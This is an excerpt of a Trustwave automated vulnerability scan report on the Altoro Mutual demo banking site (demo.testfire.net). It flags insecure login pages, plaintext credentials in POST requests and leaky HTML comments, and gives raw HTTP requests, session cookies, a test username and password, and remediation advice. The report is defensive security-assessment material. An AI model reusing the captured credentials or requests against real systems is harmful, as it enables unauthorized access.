JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 271 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: GET - http://demo.testfire.net/login.jsp
Detected password form in a non-secure page
Request: GET http://demo.testfire.net/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 272 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: GET - http://65.61.137.117:8080/login.jsp
Detected password form in a non-secure page
Request: GET http://65.61.137.117:8080/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 273 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
credentials
When the authentication information like username or password is
passed to the server via an HTTP GET request, it is supplied using
query string parameters present in the URL. As a result, this
information might be easily available on proxy or web server logs.
Similarly, if such information is sent using HTTP POST request or using
cookies over an unencrypted connection, it is prone to a man-in-the-
middle attack.
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://65.61.137.117/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS using a POST
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 274 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: GET - http://demo.testfire.net:8080/login.jsp
Detected password form in a non-secure page
Request: GET http://demo.testfire.net:8080/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 275 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: POST - http://demo.testfire.net:8080/doLogin
Detected password form in a non-secure page
Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 276 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://65.61.137.117:8080/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS using a POST
request.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 277 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://demo.testfire.net/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 278 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: POST - http://demo.testfire.net/doLogin
Detected password form in a non-secure page
Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS, either
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 279 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: POST - http://65.61.137.117:8080/doLogin
Detected password form in a non-secure page
Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 280 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: POST - http://65.61.137.117/doLogin
Detected password form in a non-secure page
Request: POST http://65.61.137.117/doLogin HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 281 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: Login credentials found in the POST request body
POST - http://demo.testfire.net:8080/doLogin
uid=CHSuser contains CHSuser
passw=Passwor1 contains Passwor1
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 282 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:A/AC:L/Au:N/C:C/I:N/A:N
Service: http
Evidence:
DetectionDetails: GET - http://65.61.137.117/login.jsp
Detected password form in a non-secure page
Request: GET http://65.61.137.117/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Remediation:
All login credentials should be transmitted using HTTPS, either
explicitly or from within a current HTTPS context.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 283 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117:8080/index.jsp HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 284 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 285 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 286 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 287 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST https://65.61.137.117/sendFeedback HTTP/1.1
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/feedback.jsp
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 288 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 289 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 290 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://65.61.137.117/sendFeedback HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 291 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 292 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 293 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://demo.testfire.net/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 294 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 295 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 296 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117:8080/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://65.61.137.117:8080/sendFeedback HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 297 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 298 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 299 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
http://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 300 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 301 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 302 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://demo.testfire.net:8443/index.jsp?content=personal.htm
GET - https://demo.testfire.net:8443/index.jsp?content=business.htm
GET - https://demo.testfire.net:8443/subscribe.jsp
POST - https://demo.testfire.net:8443/doSubscribe
GET -
https://demo.testfire.net:8443/default.jsp?content=security.htm
GET - https://demo.testfire.net:8443/survey_questions.jsp
GET - https://demo.testfire.net:8443/survey_questions.jsp?step=a
GET - https://demo.testfire.net:8443/status_check.jsp
GET - https://demo.testfire.net:8443/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 303 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 304 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 305 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://65.61.137.117/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 306 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net:8080/disclaimer.htm?url=http://www.microsoft.
com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
http://demo.testfire.net:8080/disclaimer.htm?url=http://www.microsoft.
com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 307 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net:8443/doLogin
Potentially sensitive comments found
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 308 of 1637
